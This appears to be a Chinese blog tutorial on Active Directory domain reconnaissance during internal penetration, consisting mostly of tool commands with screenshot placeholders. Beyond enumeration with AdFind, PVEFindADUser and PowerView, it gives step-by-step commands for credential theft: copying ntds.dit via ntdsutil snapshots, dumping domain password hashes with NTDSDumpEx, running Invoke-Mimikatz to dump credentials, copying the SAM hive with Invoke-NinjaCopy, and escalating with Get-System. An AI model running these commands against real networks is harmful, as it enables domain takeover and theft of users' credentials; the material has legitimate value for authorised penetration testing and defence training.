内网渗透----域内信息收集

工具使用

Nslookup

nslookup                               # 进入交互式界面
set type=all                           # 设置记录类型,可以设置为srv
_ldap._tcp.dc._msdcs.school.com        # 执行查询

内网渗透----域内信息收集_第1张图片

ADFind.exe

列出域控列表

Adfind.exe -sc dclist

在这里插入图片描述

查询域中活动的主机,输出主机名和域名

AdFind.exe -sc computers_active name dnshostname

内网渗透----域内信息收集_第2张图片
查询域中活动的主机详细信息

AdFind.exe -b dc=qianxiao996,dc=com -f "objectcategory=computer"

内网渗透----域内信息收集_第3张图片
查询域管理员账户(未成功)

AdFind.exe -b cn="domain admins",dc=qianxaio996,dc=com member

内网渗透----域内信息收集_第4张图片

从结果中筛选出SPN及域名

Adfind -sc computers_active servicePrincipalName dnshostname

内网渗透----域内信息收集_第5张图片

PVEFindADUser.exe

显示每台计算机上登录的用户

PVEFindaduser -current  -noping

内网渗透----域内信息收集_第6张图片

查看192.168.91.133主机上登录的用户

PVEFindADuser  -current  -target 192.168.91.133

内网渗透----域内信息收集_第7张图片

查看每台计算机上次登录的用户

PVEFindADuser  -last

内网渗透----域内信息收集_第8张图片

Netview.exe

netview.exe -f ip.txt

内网渗透----域内信息收集_第9张图片

Netsess.exe

NetSess.exe

内网渗透----域内信息收集_第10张图片

csvde.exe (域控)

在域控上使用csvde导出用户信息、域成员主机信息,域管理员信息
用户信息:

csvde.exe -d "cn=users,dc=com" -r "objextclass=user" -f .\Desktop\1.csv

内网渗透----域内信息收集_第11张图片

域成员主机信息:
内网渗透----域内信息收集_第12张图片

域管理员信息:
内网渗透----域内信息收集_第13张图片

导出域控中用户HASH

ntdsutil(必须以管理员运行cmd)

ntdsutil snapshot "activate instance ntds" create quit quit

内网渗透----域内信息收集_第14张图片

记得把快照保存下来

ntdsutil snapshot "mount {GUID}" quit quit

内网渗透----域内信息收集_第15张图片

将文件复制出来
内网渗透----域内信息收集_第16张图片

ntdsutil snapshot "unmount {GUID}" quit quit
ntdsutil snapshot " delete {GUID} " quit quit

内网渗透----域内信息收集_第17张图片

Ntdsdumpex.exe

域控上运行:

NTDSDumpEx.exe -r -d C:\Users\Aministrator\Desktop\ntds.dit –o hash.txt

内网渗透----域内信息收集_第18张图片
本地运行:

Ntdsdumpex.exe -r

内网渗透----域内信息收集_第19张图片

NTDSDumpEx.exe -k 4D54B7E7F7C6541D4FF486B8A83DC5B1 -d ntds.dit -o hash.txt

PowerSploit的使用

Invoke-Mimikatz(依赖管理员)

Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

内网渗透----域内信息收集_第20张图片
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

内网渗透----域内信息收集_第21张图片

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
内网渗透----域内信息收集_第22张图片

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)

Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

内网渗透----域内信息收集_第23张图片
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

内网渗透----域内信息收集_第24张图片

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

内网渗透----域内信息收集_第25张图片

Invoke-Wmicommand

Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

内网渗透----域内信息收集_第26张图片

Get-NetDomain

Import-Module .\PowerView.ps1
Get-NetDomain

内网渗透----域内信息收集_第27张图片

Get-NetDomainController

get-NetDomainController

内网渗透----域内信息收集_第28张图片

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

内网渗透----域内信息收集_第29张图片

Get-NetShare获取共享信息

get-netshare

内网渗透----域内信息收集_第30张图片

你可能感兴趣的:(内网渗透)